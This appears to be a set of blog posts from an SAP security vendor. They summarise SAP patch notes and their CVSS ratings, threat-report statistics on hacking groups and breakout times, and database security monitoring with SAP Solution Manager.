Hot News Note 2742027 patches a critical broken authentication check in SAP HANA Extended Application Services, advanced model. The vulnerability could lead to unauthorized administrative access and the exfiltration, modification or deletion of sensitive data in HANA XS. The vulnerability carries a CVSS score of 9.4/10. It ranks relatively low in terms of attack complexity and requires no privileges in target systems. HANA XS Advanced should be upgraded to the patch level specified in the Note to address the risk. The Note includes manual instructions for a workaround if an upgrade is not possible. The workaround removes the affected OIDC component. A side-effect of the workaround is the deactivation of X.509-based or SPNEGO single sign-on for HANA users.
Note 2070691 deals with a high priority information disclosure vulnerability in the SAP Solution Tools Plug-In (ST-PI) that could lead to the leakage of sensitive data including configuration data and user passwords. The information can be used to perform targeted attack against database servers for SAP systems.
Note 2729710 includes a correction for a missing XML Validation vulnerability in the System Landscape Directory (SLD).
The correction avoids processing of all XML files that use XML External Entity (XXE). This could cause the SLD to continuously loop, read arbitrary files and send local files.
The findings of the annual Internet Security Threat Report indicate that the number of organizations targeted by advanced hacking groups increased by almost one third between 2015 and 2018. The groups have not only substantially increased their cyber-espionage operations, they are also deploying increasingly sophisticated tactics against a growing number of sectors. National hacking groups such as Chafer and cross-national groups such as Dragonfly are conducting highly targeted campaigns to gather intelligence and exfiltrate data from organizations.
Chafer is linked to the use of leaked NSA exploits and is credited for several attacks against telecoms and transportation companies and their supply chains. Dragonfly has targeted primarily energy and utility companies including infiltrating the control systems of power supply systems. Other groups such as Gallmaker have been responsible for attacks against government institutions and military organizations.
Hacking groups are no longer relying on malware delivered through spear-phishing or other exploits to carry out attacks. Rather, they are using publicly available tools to execute targeted cyber-espionage campaigns. This includes tools such as Metasploit which provides tools and utilities for exploit development and deployment. Metasploit includes numerous modules for SAP exploits. Approximately 39 percent of intrusions in 2017 did not deploy any malware. The use of publicly-available tools with legitimate purposes can obfuscate attacks and prevent detection.
Despite the growing sophistication of attacks, average breakout times across all intrusions and threat actors more than doubled between 2017 and 2018 from 1 hour and 58 minutes to 4 hours 37 minutes. This is according to the 2019 Global Threat Report. The breakout metric measures the average time taken by attackers to escalate or propagate an initial compromise to other targets in a network. The increase in breakout time suggests that organizations are more effectively hardening potential targets against exploits and detecting and isolating attacks. However, the overall average masks substantial differences between threat actors. Russian threat actors have an average breakout time of just 18 minutes and 49 seconds. This means organizations typically have under 20 minutes to discover and contain attacks from Russian hacking groups. Average breakout times are lowest for Russian, North Korean and Chinese hacking groups and highest for cyber criminals.
Successfully detecting and containing cyber intrusions relies not only on speed of detection but also speed of response. Real-time or near-time threat detection should therefore be supported by effective incident response mechanisms to investigate security breaches. SAP Solution Manager provides an integrated platform for both threat detection and incident response. SolMan connects directly to event logs in SAP systems as often as every 5 minutes to detect and alert for security breaches. It also provides automated procedures for investigating and tracking incident response. To learn more, contact Layer Seven Security.
Hot News Note 2696233 deals with multiple vulnerabilities in the SAP Cloud Connector. The Connector is an agent that connects on premise systems with applications operating on the SAP Cloud Platform. The agent supports HTTP, RFC, JDBC/ODBC and other connections between on-premise and cloud installations using reverse invoke without requiring inbound ports to be opened in on-premise network firewalls. Therefore, the Connector is designed to support secure cloud and on-premise connectivity. Note 2696233 patches a missing authentication vulnerability in the SAP Cloud Connector with a CVSS score of 9.3/10. It also addresses a lower-risk code injection vulnerability that could lead to information disclosure or a denial of service in the Connector. Customers are advised to upgrade to SAP Cloud Connector 2.11.3 to remove the vulnerabilities.
Hot News Note 2727624 includes corrections for removing a critical information disclosure vulnerability in SAP Landscape Management. Landscape Management supports system cloning, copying, refreshing and other system administration tasks. The vulnerability addressed by Note 2727624 could be exploited by attackers to steal user credentials. The note recommends deleting entries in log files and changing passwords for system users that may be disclosed in logs.
Other high priority notes include 2727623 which removes a missing authorization check in SAP BW/4HANA and Note 2724788 which tackles various vulnerabilities in the Adobe PDF Print Library.
Protecting SAP systems against cyber threats requires integrated measures applied not just within the SAP layer but across the technology stack including network, operating system, and database components. As repositories of business-critical and sensitive information, databases warrant specific attention for hardening and monitoring efforts. This includes identifying and addressing configuration weaknesses, excessive privileges, and weak audit policies, encrypting data in transit and at rest, removing vulnerable stored procedures, and detecting and responding to privilege abuse or escalations.
SAP Solution Manager is uniquely positioned to monitor the security of SAP databases given its deep connectivity into SAP platforms. This article outlines the architecture and data collection procedures for database monitoring with Solution Manager. Next month’s article will explore database-level security reporting and event monitoring with SolMan.
Establishing connectivity to databases supporting SAP systems is a standard step during the mandatory configuration procedures for Solution Manager. Connection information is entered into the DB Parameters section during the Enter System Parameters step of Managed System Configuration. This includes the database host, port, and user credentials.
The connection supports the DBA Cockpit for database administration and monitoring. It also supports database extractors used by the Extractor Framework. The Extractor Framework performs data collection and distribution for monitoring and alerting in Solution Manager. The framework operates regular extractors to snapshot configuration, user, system, change and event-related data from systems. The snapshots are stored in areas such as the SolMan Configuration and Change Database (CCDB) and queried by other applications in SolMan including Configuration Validation and the Monitoring and Alerting Infrastructure (MAI). The concept of running or scheduling security scans is foreign in Solution Manager. Periodic jobs run the extractors to refresh the data. Therefore, there is no need to schedule scans or connect directly to systems to compile data when reviewing security-related information. Job Monitoring in Solution Manager can be used to monitor the relevant jobs and alert for job errors or warnings.
Solution Manager automatically applies preconfigured templates for databases once they are successfully connected for monitoring. SolMan installations are packaged with templates for all platforms supported by SAP systems including SAP databases such as HANA, Sybase and MaxDB, and third-party databases from Oracle, IBM and Microsoft. Template contents can vary based on the specific version and release of databases.
Templates for HANA platforms including metrics and alerts for monitoring system availability, performance and security. They also include CCDB stores to extract current values for HANA parameters, and details of active users, audit policies and users with critical database and system privileges.
The extractor framework and SAP-delivered templates may not provide coverage for monitoring all the security-related areas for each database platform. Therefore, customers or partners can either define their own templates or create/ modify extractors, metrics, alerts and CCDB stores to extract additional data. In the example below, we’ve added several custom stores to extract and query data for Sybase ASE that is not available in a standard Solution Manager installation. This includes runtime values for all Sybase parameters, active users, roles assigned to database users, enabled stored procedures, audit settings, and database event logs with event IDs, user IDs, and timestamps.
The stores are assigned to the custom /L7S/ namespace to avoid any conflict with SAP and other namespaces.
The extractor framework regularly refreshes the data through background jobs. Database security policies are then applied by Solution Manager against the CCDB to identify vulnerabilities and security-related events in the platform. The data is also monitored by the MAI which triggers alerts and notifications for critical risks. The results are replicated to an internal Business Warehouse (BW) in Solution Manager.
In next month’s article, we will discuss how you can use Service Level Reporting and BusinessObjects to create detailed and user-freindly reports to convey the results of database security monitoring with SAP Solution Manager.
Hot News Note 2711425 patches a critical Cross-Site Scripting (XSS) vulnerability in SAP Hybris Commerce storefronts. The vulnerability could be exploited by attackers to modify web content and compromise user-related authentication data. It affects versions 6.2 through 6.7 and 18.08 of SAP Hybris Commerce, including all but the latest patch releases. The vulnerability carries a CVSS v3.0 base score of 9.3/10 and scores particularly high in terms of impact to confidentiality and integrity. The related exploit is relatively non-complex and does not require any privileges in the target system. In addition to applying the automated updates referenced in Note 2711425, manual steps may be required to remove the vulnerability in cases where custom HTTP headers are used for caching, SAP Hybris Commerce is positioned behind a HTTP reverse proxy or load balancer, or the system is used in conjunction with a content delivery network (CDN).
Note 2642680 deals with a high-risk XML External Entity (XXE) vulnerability in SAP NetWeaver Application Server Java (AS Java) caused by missing validation for XML documents received from untrusted sources. The vulnerability could lead to the compromise of the SAP file system or enable attackers to provoke a denial of service.
Note 2658279 patches an insufficient authorization check impacting the AS Java keystore service.
Note 2698996 removes a missing authorization check in SAP Customizing Tools. The note introduces a check for object S_RFC_ADM to prevent an escalation of privileges.
